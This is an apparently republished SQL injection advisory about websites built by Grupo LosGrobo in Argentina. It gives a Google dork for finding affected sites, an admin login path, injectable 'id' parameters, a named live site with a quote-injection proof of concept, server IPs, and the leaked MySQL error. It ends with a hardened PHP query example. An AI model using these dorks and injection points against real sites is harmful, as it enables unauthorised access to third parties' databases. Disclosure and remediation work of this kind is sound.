Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability

2019.01.10
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

################################################################

# Exploit Title : Grupo LosGrobo Web Design Argentina SQL Injection Vulnerability
# Author [ Discovered By ] : KingSkrupellos
# Team : Cyberizm Digital Security Army
# Date : 10/01/2019
# Vendor Homepage : losgrobo.com ~ grupolosgrobo.com
# Tested On : Windows and Linux
# Category : WebApps
# Exploit Risk : Medium
# Google Dorks : intext:''Grupo LosGrobo'' site:ar
# Vulnerability Type : CWE-89 [ Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') ]
# Cyberizm Exploit Reference Link : cyberizm.org/cyberizm-grupo-losgrobo-web-design-argentina-sql-injection.html

################################################################

# Admin Panel Login Path :

/reportesUPJ/index.aspx

# SQL Injection Exploit :

/novedades.php?id=[SQL Injection]

/mercado.php?id=[SQL Injection]

/rse_notas.php?id=[SQL Injection]

################################################################

# Example Vulnerable Site =>

Note : (192.185.3.54) => There are 106 domains hosted on this server.

Note : (192.185.30.132) => There are 63 domains hosted on this server.

[+] upj.com.ar/novedades.php?id=719%27 => [ Proof of Concept ] => archive.fo/2kEkb

################################################################

# SQL Database Error :

Warning: session_start() [function.session-start]: Cannot send session cookie - headers already sent by (output started at /home/upjcom/public_html/novedades.php:5) in /home/upjcom/public_html/novedades_include.php on line 2

Warning: session_start() [function.session-start]: Cannot send session cache limiter - headers already sent (output started at /home/upjcom/public_html/novedades.php:5) in /home/upjcom/public_html/novedades_include.php on line 2

Consulta no válida: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' and state=1 order by created desc LIMIT 0,5' at line 1

Consulta completa: SELECT id, date_format(created,) AS fecha , title, `introtext`, alias FROM jos_content where catid=47 and id=719' and state=1 order by created desc LIMIT 0,5

################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

################################################################
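The error output above shows the `id` parameter being concatenated into the `jos_content` query and the full statement and file paths being echoed to the client. The following is an added example, not code from the advisory or the vendor, of the same lookup with input validation, bound parameters and server-side error logging; `fetch_news()`, the in-memory SQLite connection (standing in for the site's MySQL) and the sample rows are assumptions constructed for illustration.

```php
<?php
// Added example (not the vendor's code): hardened form of the query seen in the error output.
// Assumptions: fetch_news() is a hypothetical helper; PDO/SQLite stands in for MySQL.
// date_format() is omitted because its format argument is missing on the page.

function fetch_news(PDO $db, $rawId, int $catid = 47): array
{
    // 1. id is numeric in the original query: accept positive integers only.
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return [];                      // "719'" stops here, before any SQL is built
    }
    // 2. Placeholders keep request data out of the SQL text.
    $sql = 'SELECT id, created, title, introtext, alias
              FROM jos_content
             WHERE catid = :catid AND id = :id AND state = 1
             ORDER BY created DESC LIMIT 0,5';
    try {
        $stmt = $db->prepare($sql);
        $stmt->bindValue(':catid', $catid, PDO::PARAM_INT);
        $stmt->bindValue(':id', $id, PDO::PARAM_INT);
        $stmt->execute();
        return $stmt->fetchAll(PDO::FETCH_ASSOC);
    } catch (PDOException $e) {
        // 3. Log server-side; never echo the query or file paths to the client.
        error_log('news lookup failed: ' . $e->getMessage());
        return [];
    }
}

// Constructed sample data, so the example runs offline.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE jos_content (id INTEGER PRIMARY KEY, catid INTEGER, state INTEGER,
           created TEXT, title TEXT, introtext TEXT, alias TEXT)');
$db->exec("INSERT INTO jos_content VALUES
           (719, 47, 1, '2019-01-01 10:00:00', 'Sample', 'Intro', 'sample'),
           (720, 47, 0, '2019-01-02 10:00:00', 'Unpublished', 'Intro', 'unpublished')");

// Valid id, the quoted value from the advisory, a non-numeric value, an unpublished row.
foreach (['719', "719'", 'abc', '720'] as $input) {
    printf("%-8s => %d row(s)\n", var_export($input, true), count(fetch_news($db, $input)));
}
```

In production the same effect on error disclosure also requires `display_errors` to be off in the PHP configuration, so that warnings such as the `session_start()` ones above are not sent to visitors.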



Copyright 2019, cxsecurity.com

 
